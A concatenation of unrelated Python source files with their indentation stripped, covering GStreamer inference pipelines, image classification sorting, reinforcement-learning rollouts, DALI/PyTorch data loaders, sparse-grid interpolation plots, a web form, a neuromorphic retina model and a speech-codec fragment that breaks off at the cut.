for element_name, property_name, format_type in element_properties:
element = self.pipeline.get_by_name(element_name)
if element:
if (property_name in [x.name for x in element.list_properties()]):
if (format_type == "json"):
element.set_property(
property_name, json.dumps(request[key]))
else:
element.set_property(
property_name, request[key])
self._logger.debug("Setting element: {}, property: {}, value: {}".format(
element_name,
property_name,
element.get_property(property_name)))
else:
self._logger.debug("Parameter {} given for element {}"
" but no property found".format(
property_name, element_name))
else:
self._logger.debug(
"Parameter {} given for element {}"
" but no element found".format(property_name, element_name))
def _cache_inference_elements(self):
model_instance_id = "model-instance-id"
gva_elements = [(element, element.__gtype__.name + '_'
+ element.get_property(model_instance_id))
for element in self.pipeline.iterate_elements()
if (element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES
and model_instance_id in [x.name for x in element.list_properties()]
and element.get_property(model_instance_id))]
for element, key in gva_elements:
if key not in GStreamerPipeline._inference_element_cache:
GStreamerPipeline._inference_element_cache[key] = GStreamerPipeline.CachedElement(
element, [])
self._cached_element_keys.append(key)
GStreamerPipeline._inference_element_cache[key].pipelines.append(self)
def _set_default_models(self):
gva_elements = [element for element in self.pipeline.iterate_elements() if (
element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES and
"VA_DEVICE_DEFAULT" in element.get_property("model"))]
for element in gva_elements:
network = self.model_manager.get_default_network_for_device(
element.get_property("device"), element.get_property("model"))
self._logger.debug("Setting model to {} for element {}".format(
network, element.get_name()))
element.set_property("model", network)
@staticmethod
def _get_elements_by_type(pipeline, type_strings):
return [element for element in pipeline.iterate_elements()
if element.__gtype__.name in type_strings]
def _set_model_proc(self):
gva_elements = [element for element in self.pipeline.iterate_elements() if (
element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES)]
for element in gva_elements:
if element.get_property("model-proc") is None:
proc = None
if element.get_property("model") in self.model_manager.model_procs:
proc = self.model_manager.model_procs[element.get_property("model")]
if proc is not None:
self._logger.debug("Setting model proc to {} for element {}".format(
proc, element.get_name()))
element.set_property("model-proc", proc)
@staticmethod
def validate_config(config):
template = config["template"]
pipeline = Gst.parse_launch(template)
appsink_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSink"])
metaconvert = pipeline.get_by_name("metaconvert")
metapublish = pipeline.get_by_name("destination")
appsrc_elements = GStreamerPipeline._get_elements_by_type(pipeline, ["GstAppSrc"])
logger = logging.get_logger('GSTPipeline', is_static=True)
if (len(appsrc_elements) > 1):
logger.warning("Multiple appsrc elements found")
if len(appsink_elements) != 1:
logger.warning("Missing or multiple appsink elements")
if metaconvert is None:
logger.warning("Missing metaconvert element")
if metapublish is None:
logger.warning("Missing metapublish element")
def calculate_times(self, sample):
buffer = sample.get_buffer()
segment = sample.get_segment()
times = {}
times['segment.time'] = segment.time
times['stream_time'] = segment.to_stream_time(
Gst.Format.TIME, buffer.pts)
return times
def format_location_callback(self,
unused_element,
unused_fragement_id,
sample,
unused_data=None):
times = self.calculate_times(sample)
if (self._real_base is None):
clock = Gst.SystemClock(clock_type=Gst.ClockType.REALTIME)
self._real_base = clock.get_time()
self._stream_base = times["segment.time"]
metaconvert = self.pipeline.get_by_name("metaconvert")
if metaconvert:
if ("tags" not in self.request):
self.request["tags"] = {}
self.request["tags"]["real_base"] = self._real_base
metaconvert.set_property(
"tags", json.dumps(self.request["tags"]))
adjusted_time = self._real_base + \
(times["stream_time"] - self._stream_base)
self._year_base = time.strftime(
"%Y", time.localtime(adjusted_time / 1000000000))
self._month_base = time.strftime(
"%m", time.localtime(adjusted_time / 1000000000))
self._day_base = time.strftime(
"%d", time.localtime(adjusted_time / 1000000000))
template = "{prefix}/{yearbase}/{monthbase}/{daybase}"
self._dir_name = template.format(prefix=self.request["parameters"]["recording_prefix"],
yearbase=self._year_base,
monthbase=self._month_base, daybase=self._day_base)
try:
os.makedirs(self._dir_name)
except FileExistsError:
self._logger.debug("Directory already exists")
template = "{dirname}/{adjustedtime}_{time}.mp4"
return template.format(dirname=self._dir_name,
adjustedtime=adjusted_time,
time=times["stream_time"] - self._stream_base)
def _set_properties(self):
self._set_section_properties(["parameters"],
["parameters", "properties"])
self._set_section_properties(["destination", "metadata"],
["destination", "properties"])
if "destination" in self.request and \
"metadata" in self.request["destination"] and \
"type" in self.request["destination"]["metadata"]:
self._set_section_properties(["destination", "metadata"],
["destination", "metadata",
self.request["destination"]["metadata"]["type"],
"properties"])
self._set_section_properties(["source"],
["source", "properties"])
if "source" in self.request and "type" in self.request["source"]:
self._set_section_properties(["source"],
["source", self.request["source"]["type"], "properties"])
self._set_section_properties([], [])
def _get_any_source(self):
src = self.pipeline.get_by_name("source")
if (not src):
for src in self.pipeline.iterate_sources():
break
return src
def _set_model_instance_id(self):
model_instance_id = "model-instance-id"
gva_elements = [element for element in self.pipeline.iterate_elements()
if (element.__gtype__.name in self.GVA_INFERENCE_ELEMENT_TYPES)
and model_instance_id in [x.name for x in element.list_properties()]
and (element.get_property(model_instance_id) is None)]
for element in gva_elements:
name = element.get_property("name")
instance_id = name + "_" + str(self.identifier)
element.set_property(model_instance_id, instance_id)
def start(self):
self.request["models"] = self.models
self._gst_launch_string = string.Formatter().vformat(
self.template, [], self.request)
with(self._create_delete_lock):
if (self.start_time is not None):
return
self._logger.debug("Starting Pipeline {id}".format(id=self.identifier))
self._logger.debug(self._gst_launch_string)
try:
self.pipeline = Gst.parse_launch(self._gst_launch_string)
self._set_properties()
self._set_bus_messages_flag()
self._set_default_models()
self._set_model_proc()
self._cache_inference_elements()
self._set_model_instance_id()
src = self._get_any_source()
sink = self.pipeline.get_by_name("appsink")
if (not sink):
sink = self.pipeline.get_by_name("sink")
if src and sink:
src_pad = src.get_static_pad("src")
if (src_pad):
src_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
else:
src.connect(
"pad-added", GStreamerPipeline.source_pad_added_callback, self)
sink_pad = sink.get_static_pad("sink")
sink_pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.appsink_probe_callback, self)
bus = self.pipeline.get_bus()
bus.add_signal_watch()
self._bus_connection_id = bus.connect("message", self.bus_call)
splitmuxsink = self.pipeline.get_by_name("splitmuxsink")
self._real_base = None
if (not splitmuxsink is None):
splitmuxsink.connect("format-location-full",
self.format_location_callback,
None)
self._set_application_source()
self._set_application_destination()
self.pipeline.set_state(Gst.State.PLAYING)
self.start_time = time.time()
except Exception as error:
self._logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
# Context is already within _create_delete_lock
self._delete_pipeline(Pipeline.State.ERROR)
def _set_application_destination(self):
self.appsink_element = None
app_sink_elements = GStreamerPipeline._get_elements_by_type(self.pipeline, ["GstAppSink"])
if (app_sink_elements):
self.appsink_element = app_sink_elements[0]
destination = self.request.get("destination", None)
if destination and "metadata" in destination and destination["metadata"]["type"] == "application":
app_destination = AppDestination.create_app_destination(
self.request, self, "metadata")
if ((not app_destination) or (not self.appsink_element)
or (not self.appsink_element.name == "destination")):
raise Exception("Unsupported Metadata application Destination: {}".format(
destination["metadata"]["class"]))
self._app_destinations.append(app_destination)
if self.appsink_element is not None:
self.appsink_element.set_property("emit-signals", True)
self.appsink_element.set_property('sync', False)
self.avg_fps = 0
if not self._app_destinations:
self.appsink_element.connect("new-sample", self.on_sample)
else:
self.appsink_element.connect("new-sample", self.on_sample_app_destination)
def on_need_data_app_source(self, src, _):
try:
self._app_source.start_frames()
except Exception as error:
self._logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def on_enough_data_app_source(self, src):
try:
self._app_source.pause_frames()
except Exception as error:
self._logger.error("Error on Pipeline {id}: Error in App Source: {err}".format(
id=self.identifier, err=error))
src.post_message(Gst.Message.new_error(src, GLib.GError(),
"AppSource: {}".format(str(error))))
def _set_application_source(self):
self._app_source = None
self.appsrc_element = None
if self.request["source"]["type"] == "application":
appsrc_element = self.pipeline.get_by_name("source")
if (appsrc_element) and (appsrc_element.__gtype__.name == "GstAppSrc"):
self.appsrc_element = appsrc_element
self._app_source = AppSource.create_app_source(self.request, self)
if (not self._app_source) or (not self.appsrc_element):
raise Exception("Unsupported Application Source: {}".format(
self.request["source"]["class"]))
self.appsrc_element.set_property("format", Gst.Format.TIME)
self.appsrc_element.set_property("block", True)
self.appsrc_element.set_property("do-timestamp", True)
self.appsrc_element.set_property("is-live", True)
self.appsrc_element.set_property("emit-signals", True)
self.appsrc_element.connect('need-data', self.on_need_data_app_source)
self.appsrc_element.connect('enough-data', self.on_enough_data_app_source)
@staticmethod
def source_pad_added_callback(unused_element, pad, self):
pad.add_probe(Gst.PadProbeType.BUFFER,
GStreamerPipeline.source_probe_callback, self)
return Gst.FlowReturn.OK
@staticmethod
def source_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
self.latency_times[pts] = time.time()
return Gst.PadProbeReturn.OK
@staticmethod
def appsink_probe_callback(unused_pad, info, self):
buffer = info.get_buffer()
pts = buffer.pts
source_time = self.latency_times.pop(pts, -1)
if source_time != -1:
self.sum_pipeline_latency += time.time() - source_time
self.count_pipeline_latency += 1
return Gst.PadProbeReturn.OK
def on_sample_app_destination(self, sink):
self._logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
try:
for destination in self._app_destinations:
destination.process_frame(sample)
except Exception as error:
self._logger.error("Error on Pipeline {id}: Error in App Destination: {err}".format(
id=self.identifier, err=error))
return Gst.FlowReturn.ERROR
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return Gst.FlowReturn.OK
def on_sample(self, sink):
self._logger.debug("Received Sample from Pipeline {id}".format(
id=self.identifier))
sample = sink.emit("pull-sample")
try:
buf = sample.get_buffer()
for meta in GVAJSONMeta.iterate(buf):
json_object = json.loads(meta.get_message())
self._logger.debug(json.dumps(json_object))
except Exception as error:
self._logger.error("Error on Pipeline {id}: {err}".format(
id=self.identifier, err=error))
return Gst.FlowReturn.ERROR
self.frame_count += 1
self.avg_fps = self.frame_count / (time.time() - self.start_time)
return Gst.FlowReturn.OK
def bus_call(self, unused_bus, message, unused_data=None):
message_type = message.type
if message_type == Gst.MessageType.APPLICATION:
self._logger.info("Pipeline {id} Aborted".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if message_type == Gst.MessageType.EOS:
self._logger.info("Pipeline {id} Ended".format(id=self.identifier))
self._delete_pipeline_with_lock(Pipeline.State.COMPLETED)
elif message_type == Gst.MessageType.ERROR:
err, debug = message.parse_error()
self._logger.error(
"Error on Pipeline {id}: {err}: {debug}".format(id=self.identifier,
err=err,
debug=debug))
self._delete_pipeline_with_lock(Pipeline.State.ERROR)
elif message_type == Gst.MessageType.STATE_CHANGED:
old_state, new_state, unused_pending_state = message.parse_state_changed()
if message.src == self.pipeline:
if old_state == Gst.State.PAUSED and new_state == Gst.State.PLAYING:
if self.state is Pipeline.State.ABORTED:
self._delete_pipeline_with_lock(Pipeline.State.ABORTED)
if self.state is Pipeline.State.QUEUED:
self._logger.info(
"Setting Pipeline {id} State to RUNNING".format(id=self.identifier))
self.state = Pipeline.State.RUNNING
else:
if self._bus_messages:
structure = Gst.Message.get_structure(message)
if structure:
self._logger.info("Message header: {name} , Message: {message}".format(
name=Gst.Structure.get_name(structure),
message=Gst.Structure.to_string(structure)))
return True
|
import cv2
import edgeiq
import os
import json
import shutil
"""
Use image classification to sort a batch of images. The
classification labels can be changed by selecting different models.
Different images can be used by updating the files in the *source_images/*
directory.
NOTE: When developing onto a remote device, removing
images in the local *source_images/* directory on your dev machine won't remove images
from the device. They can be removed using the `aai app shell` command and
deleting them from the remote's *source_images/* directory.
To change the computer vision model, follow this guide:
https://dashboard.alwaysai.co/docs/application_development/changing_the_model.html
NOTE: This app will auto-detect and use an Intel Movidius Neural Compute stick if
present. However, not all models can make use of it!
"""
# Static keys for extracting data from config JSON file
CONFIG_FILE = 'config.json'
CLASSIFIER = 'classifier'
FOUND_FOLDER = 'found_folder'
EMPTY_FOLDER = 'empty_folder'
SOURCE_FOLDER = 'source_folder'
MODEL_ID = 'model_id'
THRESHOLD = 'confidence_level'
TARGETS = 'target_labels'
def load_json(filepath):
'''
Convenience to check and load a JSON file
'''
if os.path.exists(filepath) is False:
raise Exception(
'app.py: load_json: File at {} does not exist'.format(filepath))
with open(filepath) as data:
return json.load(data)
def main():
# 1. Load configuration data from the alwaysai.app.json file
config = load_json(
CONFIG_FILE)
found_folder = config.get(FOUND_FOLDER, 'output_images/found')
empty_folder = config.get(EMPTY_FOLDER, 'output_images/not_found')
source_folder = config.get(SOURCE_FOLDER, 'source_images')
classifier_config = config.get(CLASSIFIER, None)
# 2. Spin up just the classifier
model_id = classifier_config.get(MODEL_ID)
print('app.py: main(): initializing classifier with model id: {}'.format(
model_id))
classifier = edgeiq.Classification(model_id)
classifier.load(engine=edgeiq.Engine.DNN)
# 3. Loop through all source images
image_paths = sorted(list(edgeiq.list_images(source_folder + '/')))
image_count = len(image_paths)
print("app.py: main: Checking {} images from '{}' folder ...".format(
image_count, SOURCE_FOLDER))
for image_path in image_paths:
# 3a. Load the image to check
image_display = cv2.imread(image_path)
image = image_display.copy()
empty_path = image_path.replace(source_folder, empty_folder)
confidence = classifier_config.get(THRESHOLD)
# 3b. Find all objects the classifier is capable of finding
results = classifier.classify_image(image, confidence)
if len(results.predictions) == 0:
# Nothing found with given confidence level - move to the empty folder
shutil.move(image_path, empty_path)
continue
predictions = results.predictions
# 3c. Filter results by the target labels if specified
targets = classifier_config.get(TARGETS, None)
if targets is not None:
predictions = edgeiq.filter_predictions_by_label(
results.predictions, targets)
if len(predictions) == 0:
# No found labels match taget labels - move to the empty folder
shutil.move(image_path, empty_path)
continue
# 3d. At least one target found, move image to found folder
_, filename = os.path.split(image_path)
print('app.py: main: targets found in {}: {}'.format(
filename, predictions))
found_path = image_path.replace(source_folder, found_folder)
shutil.move(image_path, found_path)
# Print info to console upon completion
print("app.py: main: Completed sorting of {} images".format(image_count))
found_images_count = len(
list(edgeiq.list_images(found_folder)))
print("app.py: main: {} images in the output folder".format(
found_images_count))
if __name__ == "__main__":
main()
|
# -----------------------------------------------------------------------------
def readable_file_size(size, suffix="b"):
"""
Return human readable file size.
Arguments:
size : int
suffix : str
Returns:
str
"""
unit_list = ["", "k", "M", "G", "T", "P", "E", "Z"]
for unit in unit_list:
if abs(size) < 1024:
return "%d %s%s" % (size, unit, suffix)
size /= 1024
return "%d %s%s" % (size, "Yi", suffix)
|
import random
from dataclasses import dataclass
import torch
from baselines.common.vec_env.shmem_vec_env import ShmemVecEnv
from iqn.model import IQN
from core.exploration import DecayingEpsilon
@dataclass
class EnvRunner:
envs: ShmemVecEnv
qf: IQN
eps: DecayingEpsilon
device: str
def _act(self, obs):
with torch.no_grad():
a = self.qf.argmax_actions(obs)
for i in range(self.envs.num_envs):
if random.random() < self.eps():
a[i] = self.envs.action_space.sample()
return a
def __iter__(self):
ep_reward, ep_len = [], []
obs = self.envs.reset()
yield {'obs': obs}
while True:
action = self._act(obs)
obs, reward, terminal, infos = self.envs.step(action)
for info in infos:
if 'episode' in info.keys():
ep_reward.append(info['episode']['r'])
ep_len.append(info['episode']['l'])
if len(ep_reward) >= self.envs.num_envs:
ep_info = {
'episode/reward': sum(ep_reward) / len(ep_reward),
'episode/len': sum(ep_len) / len(ep_len),
}
ep_reward.clear(), ep_len.clear()
else:
ep_info = None
yield {'obs': obs, 'action': action.unsqueeze(1), 'reward': reward,
'terminal': terminal, 'ep_info': ep_info}
|
'''
The following codes are from https://github.com/d-li14/mobilenetv2.pytorch
'''
#pylint: disable=E1101,E1102,R0913,R1725,W0201,W0622,C0103,E1120,R0201,E0213
import os
import torch
import numpy as np
import torchvision.datasets as datasets
import torchvision.transforms as transforms
DATA_BACKEND_CHOICES = ['pytorch']
try:
from nvidia.dali.plugin.pytorch import DALIClassificationIterator
from nvidia.dali.pipeline import Pipeline
import nvidia.dali.ops as ops
import nvidia.dali.types as types
DATA_BACKEND_CHOICES.append('dali-gpu')
DATA_BACKEND_CHOICES.append('dali-cpu')
except ImportError:
print("Please install DALI from https://www.github.com/NVIDIA/DALI to run this example.")
class HybridTrainPipe(Pipeline):
"""
Pipeline for training
"""
def __init__(self, batch_size, num_threads, device_id, data_dir, crop, dali_cpu=False):
'''
Init function for training pipeline
:param batch_size: batch size for training
:param num_threads: number of threads to use
:param device_id: device id
:param data_dir: name of data directory
:param crop: shape of cropped image
:param dali_cpu: whether running on cpu or not
'''
super(HybridTrainPipe, self).__init__(batch_size, num_threads, \
device_id, seed = 12 + device_id)
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
self.input = ops.FileReader(
file_root = data_dir,
shard_id = local_rank,
num_shards = world_size,
random_shuffle = True)
if dali_cpu:
dali_device = "cpu"
self.decode = ops.HostDecoderRandomCrop(device=dali_device, output_type=types.RGB,
random_aspect_ratio=[0.75, 4./3.],
random_area=[0.08, 1.0],
num_attempts=100)
else:
dali_device = "gpu"
# This padding sets the size of the internal nvJPEG buffers to
# be able to handle all images from full-sized ImageNet
# without additional reallocations
self.decode = ops.ImageDecoderRandomCrop(device="mixed", \
output_type=types.RGB, device_memory_padding=211025920, \
host_memory_padding=140544512,
random_aspect_ratio=[0.75, 4./3.],
random_area=[0.08, 1.0],
num_attempts=100)
self.res = ops.Resize(device=dali_device, resize_x=crop,\
resize_y=crop, interp_type=types.INTERP_TRIANGULAR)
self.cmnp = ops.CropMirrorNormalize(device = "gpu",
output_dtype = types.FLOAT,
output_layout = types.NCHW,
crop = (crop, crop),
image_type = types.RGB,
mean = [0.485 * 255,0.456 * 255,0.406 * 255],
std = [0.229 * 255,0.224 * 255,0.225 * 255])
self.coin = ops.CoinFlip(probability = 0.5)
def define_graph(self):
"""
Define graph function
:return: (output, labels): images of data, and labels of data
"""
rng = self.coin()
self.jpegs, self.labels = self.input(name = "Reader")
images = self.decode(self.jpegs)
images = self.res(images)
output = self.cmnp(images.gpu(), mirror = rng)
return [output, self.labels]
class HybridValPipe(Pipeline):
"""
Pipeline for validation
"""
def __init__(self, batch_size, num_threads, device_id, data_dir, crop, size):
'''
Init function for validation pipeline
:param batch_size: batch size for training
:param num_threads: number of threads to use
:param device_id: device id
:param data_dir: name of data directory
:param crop: shape of cropped image
:param size: size of images
'''
super(HybridValPipe, self).__init__(batch_size, num_threads,\
device_id, seed = 12 + device_id)
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
self.input = ops.FileReader(
file_root = data_dir,
shard_id = local_rank,
num_shards = world_size,
random_shuffle = False)
self.decode = ops.ImageDecoder(device = "mixed", output_type = types.RGB)
self.res = ops.Resize(device = "gpu", resize_shorter = size)
self.cmnp = ops.CropMirrorNormalize(device = "gpu",
output_dtype = types.FLOAT,
output_layout = types.NCHW,
crop = (crop, crop),
image_type = types.RGB,
mean = [0.485 * 255,0.456 * 255,0.406 * 255],
std = [0.229 * 255,0.224 * 255,0.225 * 255])
def define_graph(self):
"""
Define graph function
:return: (output, labels): images of data, and labels of data
"""
self.jpegs, self.labels = self.input(name = "Reader")
images = self.decode(self.jpegs)
images = self.res(images)
output = self.cmnp(images)
return [output, self.labels]
class DALIWrapper:
"""
Wrapper Class
"""
def gen_wrapper(dalipipeline):
"""
generate wrapper function
:param dalipipeline: dali pipeline
"""
for data in dalipipeline:
input = data[0]["data"]
target = data[0]["label"].squeeze().cuda().long()
yield input, target
dalipipeline.reset()
def __init__(self, dalipipeline):
"""
Init function for initialization
"""
self.dalipipeline = dalipipeline
def __iter__(self):
"""
Iterator function
"""
return DALIWrapper.gen_wrapper(self.dalipipeline)
def get_dali_train_loader(dali_cpu=False):
"""
DALI train loader
:param dali_cpu: whether cpus is used
:return: gdtl: output of gdtl function
"""
def gdtl(data_path, batch_size, workers=5, _worker_init_fn=None):
"""
DALI train loader function
:param data_path: image data path
:param batch_size: batch size in training phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
:return: DALIWrapper(train_loader) or int(pipe.epoch_size("Reader") / (world_size * batch_size)): wrapper of train loader, or number of batch
"""
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
traindir = os.path.join(data_path, 'train')
pipe = HybridTrainPipe(batch_size=batch_size, num_threads=workers,
device_id = local_rank,
data_dir = traindir, crop = 224, dali_cpu=dali_cpu)
pipe.build()
train_loader = DALIClassificationIterator(pipe, size \
= int(pipe.epoch_size("Reader") / world_size))
return DALIWrapper(train_loader), \
int(pipe.epoch_size("Reader") / (world_size * batch_size))
return gdtl
def get_dali_val_loader():
"""
DALI valid loader
:return: gdvl: output of gdvl function
"""
def gdvl(data_path, batch_size, workers=5, _worker_init_fn=None):
"""
DALI valid loader function
:param data_path: image data path
:param batch_size: batch size in validation phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
:return: DALIWrapper(val_loader) or int(pipe.epoch_size("Reader") / (world_size * batch_size)): wrapper of validation loader, or number of batch
"""
if torch.distributed.is_initialized():
local_rank = torch.distributed.get_rank()
world_size = torch.distributed.get_world_size()
else:
local_rank = 0
world_size = 1
valdir = os.path.join(data_path, 'val')
pipe = HybridValPipe(batch_size=batch_size, num_threads=workers,
device_id = local_rank,
data_dir = valdir,
crop = 224, size = 256)
pipe.build()
val_loader = DALIClassificationIterator(pipe, size \
= int(pipe.epoch_size("Reader") / world_size), fill_last_batch=False)
return DALIWrapper(val_loader), \
int(pipe.epoch_size("Reader") / (world_size * batch_size))
return gdvl
def fast_collate(batch):
"""
collate function
:param batch: batch images
:return: (tensor, targets): tensor for images, and labels of images
"""
imgs = [img[0] for img in batch]
targets = torch.tensor([target[1] for target in batch], dtype=torch.int64)
w = imgs[0].size[0]
h = imgs[0].size[1]
tensor = torch.zeros( (len(imgs), 3, h, w), dtype=torch.uint8 )
for i, img in enumerate(imgs):
nump_array = np.asarray(img, dtype=np.uint8)
if nump_array.ndim < 3:
nump_array = np.expand_dims(nump_array, axis=-1)
nump_array = np.rollaxis(nump_array, 2)
tensor[i] += torch.from_numpy(nump_array)
return tensor, targets
class PrefetchedWrapper:
"""
Prefetched Wrapper
"""
def prefetched_loader(self,loader):
"""
Prefetched loader function
:param loader: loading data
:return: (tensor, targets): tensor for images, and labels of images
"""
mean = torch.tensor([0.485 * 255, 0.456 * 255, 0.406 * 255]).cuda().view(1,3,1,1)
std = torch.tensor([0.229 * 255, 0.224 * 255, 0.225 * 255]).cuda().view(1,3,1,1)
stream = torch.cuda.Stream()
first = True
for next_input, next_target in loader:
with torch.cuda.stream(stream):
next_input = next_input.cuda(non_blocking=True)
next_target = next_target.cuda(non_blocking=True)
next_input = next_input.float()
next_input = next_input.sub_(mean).div_(std)
if not first:
yield input, target
else:
first = False
torch.cuda.current_stream().wait_stream(stream)
input = next_input
target = next_target
yield input, target
def __init__(self, dataloader):
"""
Init function
:param dataloader: loading data
"""
self.dataloader = dataloader
self.epoch = 0
def __iter__(self):
"""
Iterator function
:return: PrefetchedWrapper.prefetched_loader(self.dataloader): wrapper of prefetched loader
"""
if (self.dataloader.sampler is not None and
isinstance(self.dataloader.sampler,
torch.utils.data.distributed.DistributedSampler)):
self.dataloader.sampler.set_epoch(self.epoch)
self.epoch += 1
return PrefetchedWrapper.prefetched_loader(self.dataloader)
def get_pytorch_train_loader(data_path, batch_size, workers=5, \
_worker_init_fn=None, input_size=224):
"""
train loader function
:param data_path: image data path
:param batch_size: batch size in training phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
:param input_size: image size
:return: (PrefetchedWrapper(train_loader), len(train_loader)): prefetcehd wrapper of training loader, and length of training loader
"""
traindir = os.path.join(data_path, 'train')
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(input_size),
transforms.RandomHorizontalFlip(),
]))
if torch.distributed.is_initialized():
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, shuffle=(train_sampler is None),
num_workers=workers, worker_init_fn=_worker_init_fn, \
pin_memory=True, sampler=train_sampler, collate_fn=fast_collate)
return PrefetchedWrapper(train_loader), len(train_loader)
def get_pytorch_val_loader(data_path, batch_size, workers=5, _worker_init_fn=None, input_size=224):
"""
validation loader function
:param data_path: image data path
:param batch_size: batch size in training phase
:param workers: how much workers we use
:param _worker_init_fn: initialize worker function
:param input_size: image size
:return: (PrefetchedWrapper(val_loader), len(val_loader): prefetcehd wrapper of validation loader, and length of validation loader
"""
valdir = os.path.join(data_path, 'val')
val_dataset = datasets.ImageFolder(
valdir, transforms.Compose([
transforms.Resize(int(input_size / 0.875)),
transforms.CenterCrop(input_size),
]))
if torch.distributed.is_initialized():
val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset)
else:
val_sampler = None
val_loader = torch.utils.data.DataLoader(
val_dataset,
sampler=val_sampler,
batch_size=batch_size, shuffle=False,
num_workers=workers, worker_init_fn=_worker_init_fn, pin_memory=True,
collate_fn=fast_collate)
return PrefetchedWrapper(val_loader), len(val_loader)
|
#!/usr/bin/python3
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import pysgpp
import helper.basis
import helper.function
import helper.grid
f = "beale"
d = 2
p = 3
b = 1
ns = list(range(1, 8))
grids = [
helper.grid.SGppGrid("bSpline", d, p, b),
helper.grid.SGppGrid("notAKnotBSpline", d, p, b),
helper.grid.SGppGrid("modifiedBSpline", d, p),
helper.grid.SGppGrid("modifiedNotAKnotBSpline", d, p),
helper.grid.SGppGrid("bSplineNoBoundary", d, p),
helper.grid.SGppGrid("notAKnotBSpline", d, p, 100),
]
f = helper.function.SGppTestFunction(f, d)
fig = plt.figure()
#ax = fig.add_subplot(111, projection="3d")
ax = fig.gca()
XX0, XX1, XX = helper.grid.generateMeshGrid((100, 100))
Ns= np.zeros((len(grids), len(ns)))
errors = np.zeros((len(grids), len(ns)))
for q, grid in enumerate(grids):
basis1D = helper.basis.SGppBasis(grid.grid.getBasis())
basis = helper.basis.TensorProduct(basis1D, d)
for r, n in enumerate(ns):
grid.generateRegular(n)
X, L, I = grid.getPoints()
if q == 5:
K = np.any(L == 0, axis=1).nonzero()[0].tolist()
K = pysgpp.IndexList(K)
grid.grid.getStorage().deletePoints(K)
X, L, I = grid.getPoints()
fX = f.evaluate(X)
#fInterp = helper.function.Interpolant(basis, X, L, I, fX)
fInterp = helper.function.SGppInterpolant(grid.grid, fX)
YY = np.reshape(fInterp.evaluate(XX), XX0.shape)
#ax.plot_surface(XX0, XX1, YY)
errors[q, r] = f.computeRelativeL2Error(fInterp)
Ns[q, r] = X.shape[0]
for q, _ in enumerate(grids):
ax.plot(Ns[q,:], errors[q,:], ".-")
ax.set_xscale("log")
ax.set_yscale("log")
ax.legend([str(grid) for grid in grids])
plt.show()
|
from wtforms import Form, validators, StringField, FloatField
class DeviceDataCreateForm(Form):
device_token = StringField(
"Device Token", [validators.DataRequired(), validators.length(max=255)]
)
type = StringField("Type", [validators.DataRequired(), validators.length(max=255)])
value = FloatField("Value", [validators.DataRequired()])
|
import os
os.system("conan install . -g txt")
|
import logging
try:
import spynnaker7.pyNN as pyNN
except ImportError:
import spynnaker.pyNN as pyNN
logger = logging.getLogger(__file__)
class Retina(object):
def __init__(self, spike_times=None, label='retina', mode='offline'):
"""
Args:
spike_times: list of lists of lists for the spiking of each neuron in each population
label: label to distinguish between left and right SpikeSourceArray populations
mode: str, can be 'online' or 'offline' and decides whether the spiking is
from pre-recorded input (`spike_times`) or live input stream
"""
# NOTE: numpy is row-major so the first axis represents the pixel columns (vertical) i.e. fixed x-coordinate
# and the second the pixels within this column i.e. all y-coordinates
# here n_cols and n_rows stand for the column_populations and rows within this column (not numpy rows/columns!)
self.n_cols, self.n_rows = spike_times.shape[:2]
self.pixel_populations = []
self.label = label
if mode == 'offline':
self._init_spiketimes(spike_times)
else:
logger.error("Live input streaming is not supported yet. Provide a spike_times array instead.")
raise NotImplementedError
def _init_spiketimes(self, spike_times):
"""
Initialise the spiking times of an offline Retina SpikeSourceArray populations
Args:
spike_times: a list of lists of lists for the spiking times of all the neurons
Returns:
In-place method
"""
logger.info("Initialising {} SpikeSourceArray with resolution {}.".format(self.label, (self.n_cols,
self.n_rows)))
if spike_times is not None:
for col_id, col in enumerate(spike_times):
col_of_pixels = pyNN.Population(size=self.n_rows,
cellclass=pyNN.SpikeSourceArray,
cellparams={'spike_times': col},
label="{0}_{1}".format(self.label, col_id), structure=pyNN.Line())
self.pixel_populations.append(col_of_pixels)
def create_retina(spike_times=None, label='retina', mode='offline'):
"""
A wrapper around the Retina class.
Args:
spike_times: see Retina docstring
label: see Retina docstring
mode: see Retina docstring
Returns:
A list of SpikeSourceArray populations representing the retina pixel columns.
"""
retina = Retina(spike_times, label, mode)
return retina.pixel_populations
|
from basic_op import *
from oper_32b import *
from ld8a import *
from tab_ld8a import *
from typing import List
def Lsp_Az(lsp: List[int], a: List[int], aOffset: int) -> None:
"""
# (i) Q15 : line spectral frequencies
# (o) Q12 : predictor coefficients (order = 10)
"""
f1 = [0] * 6
f2 = [0] * 6
Get_lsp_pol(lsp, 0 + lspIndexOffset, f1)
Get_lsp_pol(lsp, 1 + lspIndexOffset, f2)
for i in range(5, 0, -1):
f1[i] = L_add(f1[i], f1[i - 1]) # f1[i] += f1[i-1]
